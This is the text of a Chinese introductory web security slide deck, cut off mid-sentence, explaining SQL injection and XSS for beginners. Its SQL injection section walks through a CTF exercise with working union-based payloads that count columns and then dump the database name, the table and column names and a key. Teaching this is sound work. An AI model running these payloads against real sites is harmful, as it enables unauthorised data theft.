web安全入门.ppt

Web安全初探 主讲：郭宁 QQ ：623063048 Blog：/ * 一、Web 二、Web漏洞 三、入门 * Web * Web 一、从B/S架构说起 B/S架构（Browser/Server，浏览器/服务器模式） * Web 二、一个Web程序的执行过程 1.组成部分 服务器：硬件+软件（操作系统+Web容器） 语言 ：asp、php、aspx 数据库：access、mysql、sqlserver 2.Hello World /*Hello World 程序演示*/ * Web漏洞 一、漏洞种类 SQL注入、XSS、目录遍历、权限绕过、弱口令....... * Web漏洞 二、漏洞分析之SQL注入 数据库基础 所谓数据库，即数据存储的仓库，通常用二维的数据表来存储数据，数据表的每一列称为一个字段，每一行称为一条记录，通过SQL查询语句可以对数据进行查询、增加、删除、修改等操作。 SQL语言 SQL一般指结构化的查询语言，主要用来对数据库进行查询、修改、及数据库表的修改等相关操作。常用的语句语句有：select，insert，update，delete等。 * Web漏洞 二、漏洞分析之SQL注入 注入原理 当我们浏览网页的时候，会向服务器传递参数，所要传递的参数可能通过GET或POST方式。GET为显式传参，即所传递的参数会在url上显示；POST为隐式传参，即在url上不能看到所传递的参数。 Burpsuit分析参数传递过程。 * Web漏洞 二、漏洞分析之SQL注入 实例分析 29/study/sql_injection/sqli.php 爆错 构造注入框架 构造payload 注入工具 Sqlmap 学习资源 《SQL注入攻击与防御》 Sqli-labs 地址：/Audi-1/sqli-labs 教程：/course/index/video/id/54 * Web漏洞 二、漏洞分析之SQL注入 CTF（/main.php） 简单的注入 判断字段数 order by 3 获取数据库名、版本 union select 1,database(),3--+ 获取表名 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+ 获取列名 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=sae_user_sqli3),3--+ 获取key union select 1,group_concat(content),3 from sae_user_sqli3--+ * Web漏洞 二、漏洞分析之XSS(Cross Site Scripting) 什么是XSS跨站脚本 XSS是一种经常出现在web应用中的计算机安全漏洞，它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者可以利用XSS漏洞获取一定的权限。这种类型的漏洞由于被黑客用来编写危害性更大的蠕虫病毒，对网络造成巨大损失。对于跨站脚本攻击，黑客界共识是：跨站脚本攻击是新型的“缓冲区溢出攻击“，而JavaScript是新型的“ShellCode”。 由于和另一种网页技术--层叠样式表（Cascading Style Sheets,CSS）的缩写一样，为了防止混淆，故把原本的CSS检称为XSS。 * Web漏洞 二、漏洞分析之XSS(Cross Site Scripting) 什么是XSS跨站脚本 一图胜千言 * Web漏洞 二、漏洞分析之XSS(Cross Site Scripting) 什么是XSS跨站脚本 一图胜千言 * Web漏洞 二、漏洞分析之XSS(Cross Site Scripting) JavaScript基础 JavaScript是一种属于网络的脚本语言,已经被广泛用于Web应用开发,常用来为网页添加各式各样的动态功能,为用户提供更流畅美观的浏览效果。通常JavaScript脚本是通过嵌入在HTML中来实现自身的功能的。 Cookie（储存在用户本地终端上的数据） 服务器可以利用Cookies的包含信息来判断在HT